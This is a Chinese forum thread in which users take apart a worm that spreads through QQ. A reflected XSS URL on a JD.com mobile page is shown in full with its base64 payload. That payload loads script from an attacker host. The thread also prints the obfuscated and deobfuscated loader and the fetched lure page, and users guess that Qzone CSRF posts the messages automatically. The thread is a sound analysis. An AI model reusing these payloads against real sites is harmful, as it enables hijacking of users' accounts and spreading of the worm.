这是京东被日了？ qq 或 tim 打开就会自动发说说

还原的长链接

http://initem.m.jd.com/product/1.html?奔驰男撞人还打人！嚣张气焰终于被干了！过瘾...24101"};eval(atob('dmFyIHM9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpOw0Kcy5zcmMgPSAiaHR0cDovL3d3dy5xcXZpZGVvLmdhL3htbC5waHAiOw0KZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs='));x={c:"x

eval 这个函数你不觉得眼熟嘛？

jd 这个页面有 xss

atob 解密出来是

"var s= document.createElement(\"script\");

s.src = \"http://www.qqvideo.ga/xml.php\";

document.head.appendChild(s);"

在 qq 中点开这个 php 链接得到的是

(~eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('r=f(){l s};f m(6){7 4="";p(7 i=0;i<6.q;i++){7 a=6.t(i);e(a=="+"){4+=" "}d e(a=="%"){7 b=6.n(i+1,i+3);e(j("h"+b)>w){4+=x("%"+6.n(i+1,i+9));i+=8}d{4+=u.v(j("h"+b));i+=2}}d{4+=a}}l 4}f o(k){5.M("N/O","J");5.K(m(L(k.R)));5.Q()}7 g=5.P("B");g.C="y://z.D.H/I.G?E=c";5.F.A(g);',54,54,'||||ret|document|str|var|||chr|asc||else|if|function|vs|0x||parseInt|req|return|URLdecode|substring|callback_vs|for|length|onerror|true|charAt|String|fromCharCode|0x7f|decodeURI|http|www|appendChild|script|src|qqvideo|ac|head|php|ga|xml|replace|write|atob|open|text|html|createElement|close|content'.split('|'),0,{})))


不知道咋解密这 js。。。也许已经访问过会不一样？

洁癖用户试试这个


http://initem.m.jd.com/product/1.html?%22};eval(console.log(%27XSS%20TEST%27));x={c:%22x

@fucker 对
京东的 xss 已经很显然了，但在用户不知情的情况下自动发说说咋实现的 这一点也许更有趣

京东的反射性 XSS+腾讯 QQ 空间的 CSRF，如果在 qq 空间中所发的内容包含原短连接，那么就是组合型的蠕虫漏洞的。

京东的 XSS 经过了混淆的,大概意思就是从 http://www.qqvideo.ga/xml.php 这个页面获取下一步动作

电脑访问会跳转到腾讯视频，手机访问则会直接执行恶意代码

###修改 UA 访问以下链接就会得到不同的内容。
http://www.qqvideo.ga/xml.php

@cy97cool 你用 QQ 浏览器或者 QQ 内嵌浏览器，目测可以执行代码，自动发说说。
如果你换其他浏览器，或者清空 QQ 浏览器 cookie，那是肯定不能发说说的。
估计是 csrf

@cy97cool 可以搜一搜 CSRF 漏洞，大概意思就是 http://www.qq.com/forget.php 这个是一个忘记密码的页面，一般需要用户自己进去，但是黑客可以构造一个页面让你访问后直接访问 http://www.qq.com/forget.php?yes 这个页面，造成的效果就是访问了一个其他的页面，缺执行了 qq 里面的动作。 一般是没有加上 token 造成的漏洞。楼主这个地方也可能是别的漏洞造成的，但是我觉得 CSRF 可能性最大。

@Va1n3R 原理其实我都懂。。。。只是想知道这个 csrf 的具体实现

@cy97cool 看到#7 @Va1n3R 的回复，估计差不多了。
那段 js 是混淆过的，（常年目测 md5 值的）我目测是模拟用户发布说说的动作

@Va1n3R 大神能不能解密一下人家这 xml.php 啊

我已经在 4 楼给出了，但尝试执行也会报 c35 没定义的错。。。手动把 c35 定义为 0 可以得到内容但网址是 undefined

刚刚试了一下已经修了？

@cy97cool 那你直接 document.write 一下呀，把 eval 去掉就可以了

看错了还没修

没生效啊

@fucker 你试试咯。。。。
c35 is not defined

难道 qq 浏览器有啥 js 内置变量导致这个判断能过？

@cy97cool 应该是对别的 js 的 hack，没有上下文关系，当然是未定义了

将 c35 分别等于 true 和 false 可以得到两份代码，然后将两份代码合并就能得到完整代码
----------------------
onerror = function () { return true };

function URLdecode(str) {
var ret = "";
for (var i = 0;
i < str.length;
i++) {
var chr = str.charAt(i);
if (chr == "+") { ret += " " } else if (chr == "%") {
var asc = str.substring(i + 1, i + 3);
if (parseInt("0x" + asc) > 0x7f) {
ret += decodeURI("%" + str.substring(i + 1, i + 9));
i += 8
} else {
ret += String.fromCharCode(parseInt("0x" + asc));
i += 2
}
} else { ret += chr }
} return ret
}

function callback_vs(req) {
document.open("text/html", "replace");
document.write(URLdecode(atob(req.content)));
document.close()
}

var vs = document.createElement("script");

vs.src = "http://www.qqvideo.ga/xml.php?ac==c";


document.head.appendChild(vs);
-----------------------------

解开了，上面第一次获取的是一个 GET 访问动作:
http://www.qqvideo.ga/xml.php?ac=c
获取下一步操作
内容是一段 base64 和 URLencode 的处理过的，
```HTML
<!doctype html><html><head><title>精彩视频分享！</title><meta charset="utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"name="viewport"/><link rel="stylesheet"href="http://www.qqvideo.ga/inc/css.css?121509"><script src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js"></script><script src="http://www.qqvideo.ga/inc/clipboard.min.js"></script><script src="http://imgcache.gtimg.cn/tencentvideo_v1/tvp/js/tvp.player_v2.js"></script><meta itemprop="name"content=""/><meta itemprop="image"content=""/><meta name="description"itemprop="description"content=""/></head><body><div class="rich_media_title"></div><div class="videoId" id="videoId"></div><div class="winfo"><div class="txttj"><ul id="text_info"></ul></div><div class="imgtj"><div class="wntj"><span>为你推荐</span></div><div class="imgtjlist"></div></div></div><div class="fxbac"></div><div class="sharebox"><div class="p1msg">请分享到 QQ 空间！<br>分享完成后可继续观看。</div><div class="box-bottom"><a class="button-l"href='javascript:;'rel="noreferrer">立即分享</a><span class="button-r">取消</span></div></div><script type="text/javascript"src="http://www.qqvideo.ga/index.js?121535"></script><span style="display:none;"><script src="https://js.users.51.la/6036599.js"></script></span><span id="bottom">Copyright&copy 2017-2018</span></body></html>
```
懒的搞了，服了这些黑产的....